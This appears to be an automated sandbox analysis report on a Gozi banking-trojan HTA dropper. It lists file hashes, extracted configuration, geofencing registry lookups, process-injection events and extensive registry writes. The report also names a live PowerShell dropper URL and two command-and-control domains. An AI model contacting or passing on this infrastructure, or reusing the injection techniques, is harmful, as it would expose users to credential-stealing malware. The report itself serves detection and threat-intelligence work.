gozi | 0389108b0322ecbbadd21a245c1b75f93e38a2e51a8b38a385596ebe05c323cf

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
06-10-2023 11:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client_5.hta
Size

22KB
MD5

988f8a03ac893e41d4f9aaca5addafe1
SHA1

d3bda7e7be11da19cd3adf16a4c58548eb573f74
SHA256

0389108b0322ecbbadd21a245c1b75f93e38a2e51a8b38a385596ebe05c323cf
SHA512

2dd80008e91d35da4d60572be008ab60ae7edd5ebe5b94518c3bfb3aa573c812e2abeb3c7d4033ca9cf5b99e64db5537c79b3e6aae8bd89e894de7fcc2a5b1c1
SSDEEP

384:pA7lUDQMeK43MV0p6WUuJOJjmF9Koq5nZN851z9fwP3jXMeSnqIc6l:H2MWqwRwPDd6l

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

37 3188 powershell.exe

flow	pid	process
37	3188	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

Processes:

gPEkKBRh.exe

pid process

1108 gPEkKBRh.exe

pid	process
1108	gPEkKBRh.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4884 set thread context of 3260	4884	powershell.exe	Explorer.EXE
PID 3260 set thread context of 3808	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 set thread context of 4024	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 set thread context of 4176	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 set thread context of 3984	3260	Explorer.EXE	RuntimeBroker.exe
PID 3260 set thread context of 2752	3260	Explorer.EXE	cmd.exe
PID 3260 set thread context of 3632	3260	Explorer.EXE	cmd.exe
PID 2752 set thread context of 3976	2752	cmd.exe	PING.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3560 1108 WerFault.exe gPEkKBRh.exe

pid	pid_target	process	target process
3560	1108	WerFault.exe	gPEkKBRh.exe

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b067e76e-81a5-44bb-a3 = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87a3e9b3-5546-449d-8c	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7035e6bf-fe2d-4547-a1	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4877e610-3831-4aa8-9d = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f29dbc4-c8ea-461d-9e = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b067e76e-81a5-44bb-a3 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15a1826c-093f-49e0-ba = "\\\\?\\Volume{692520D5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d8a021f744ca49f0d73de10b81314da27205cfc1f23a1091d9d0de81118bd5a"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15a1826c-093f-49e0-ba = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4877e610-3831-4aa8-9d = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f82152594cf8d901c83584594cf8d901c83584594cf8d901fe4505000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000366438613032316637343463613439663064373364653130623831333134646132373230356366633166323361313039316439643064653831313138626435610000b20009000400efbe46573d5f46573d5f2e00000000000000000000000000000000000000000000000000f1f25500360064003800610030003200310066003700340034006300610034003900660030006400370033006400650031003000620038003100330031003400640061003200370032003000350063006600630031006600320033006100310030003900310064003900640030006400650038003100310031003800620064003500610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643861303231663734346361343966306437336465313062383133313464613237323035636663316632336131303931643964306465383131313862643561000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c097fc54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c097fc54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4877e610-3831-4aa8-9d = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6df044db-516c-4b41-92	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15a1826c-093f-49e0-ba = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a0fa20e-2791-4377-b3 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000df03cf584cf8d901df03cf584cf8d901df03cf584cf8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000633263353162373865643363643366323336636532616138633064663931616564313464333736386339313233313430623735313463613331626239396234370000b20009000400efbe46573d5f46573d5f2e0000000000000000000000000000000000000000000000000021a34700630032006300350031006200370038006500640033006300640033006600320033003600630065003200610061003800630030006400660039003100610065006400310034006400330037003600380063003900310032003300310034003000620037003500310034006300610033003100620062003900390062003400370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63326335316237386564336364336632333663653261613863306466393161656431346433373638633931323331343062373531346361333162623939623437000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c097ac54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c097ac54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\87a3e9b3-5546-449d-8c = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002efb4a594cf8d9012c8573594cf8d9012c8573594cf8d901ba2504000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000643835656561373232303939343135653235666566393634616239313061373735303634333638306636343265383331346564373036363061313961303134310000b20009000400efbe46573d5f46573d5f2e00000000000000000000000000000000000000000000000000d7066900640038003500650065006100370032003200300039003900340031003500650032003500660065006600390036003400610062003900310030006100370037003500300036003400330036003800300066003600340032006500380033003100340065006400370030003600360030006100310039006100300031003400310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64383565656137323230393934313565323566656639363461623931306137373530363433363830663634326538333134656437303636306131396130313431000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c097cc54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c097cc54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\570401a0-a9bd-4df1-99 = "\\\\?\\Volume{692520D5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\004781d8cb06fab4562466f6cc7fc6ff379060aa8d3d8010a7d341a895f6ea5d"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7035e6bf-fe2d-4547-a1 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d4bf4f594cf8d901c83584594cf8d901c83584594cf8d901196c05000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000383233653531333534363333656164393966366663386239313166663264386436303861333330626663653830653630626562336165396264666163343735380000b20009000400efbe46573d5f46573d5f2e000000000000000000000000000000000000000000000000000aa36600380032003300650035003100330035003400360033003300650061006400390039006600360066006300380062003900310031006600660032006400380064003600300038006100330033003000620066006300650038003000650036003000620065006200330061006500390062006400660061006300340037003500380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38323365353133353436333365616439396636666338623931316666326438643630386133333062666365383065363062656233616539626466616334373538000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c097ec54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c097ec54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15a1826c-093f-49e0-ba = 2ce7cc584cf8d901	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6df044db-516c-4b41-92	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6df044db-516c-4b41-92 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000bf3727594cf8d901b27c0e5a4cf8d901b27c0e5a4cf8d901476604000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000046573d5f2000633263353162373865643363643366323336636532616138633064663931616564313464333736386339313233313430623735313463613331626239396234370000b20009000400efbe46573d5f46573d5f2e0000000000000000000000000000000000000000000000000021a34700630032006300350031006200370038006500640033006300640033006600320033003600630065003200610061003800630030006400660039003100610065006400310034006400330037003600380063003900310032003300310034003000620037003500310034006300610033003100620062003900390062003400370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000729bbfb01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63326335316237386564336364336632333663653261613863306466393161656431346433373638633931323331343062373531346361333162623939623437000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f787771646b7376000000000000000082671612f74e484cb69989136ee22c0981c54f959b53ee11a4ad66f79730121682671612f74e484cb69989136ee22c0981c54f959b53ee11a4ad66f797301216ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0032003300340034003600380038003000310033002d0032003900360035003400360038003700310037002d0032003000330034003100320036002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d5202569000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\570401a0-a9bd-4df1-99	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4877e610-3831-4aa8-9d	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f29dbc4-c8ea-461d-9e = 0ee50d5a4cf8d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\570401a0-a9bd-4df1-99 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4877e610-3831-4aa8-9d = 8c86025a4cf8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4877e610-3831-4aa8-9d	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209e16ac-990d-425d-88	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7035e6bf-fe2d-4547-a1 = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7035e6bf-fe2d-4547-a1 = "\\\\?\\Volume{692520D5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\823e51354633ead99f6fc8b911ff2d8d608a330bfce80e60beb3ae9bdfac4758"	RuntimeBroker.exe
